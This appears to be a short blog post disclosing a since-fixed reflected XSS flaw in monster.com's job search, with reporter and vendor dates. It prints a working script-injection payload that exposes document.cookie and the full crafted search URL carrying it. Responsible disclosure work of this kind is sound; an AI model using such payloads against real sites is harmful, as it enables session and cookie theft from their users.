This is a reported "Reflected XSS" on monster.com which i've reported it responsibly on 28/06/2012 and monster.com have silently fixed it without replying back to me. Life is such.
Severity: Reflected XSS
Confidence: Certain
Host: http://jobsearch.monster.com/
Path: /search/
Issue detail:
What i did was to enter the below XSS vector in the search fields.
"><img src=x onerror=prompt(document.cookie);>
You will have something like the following:
http://jobsearch.monster.com/search/__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E_5?q=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E&where=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E
This is the screenshot after i sent the payload.
Reported by: Jacob Soo
Vendor Notification: June 28, 2012
Resolution: July 2012
No comments:
Post a Comment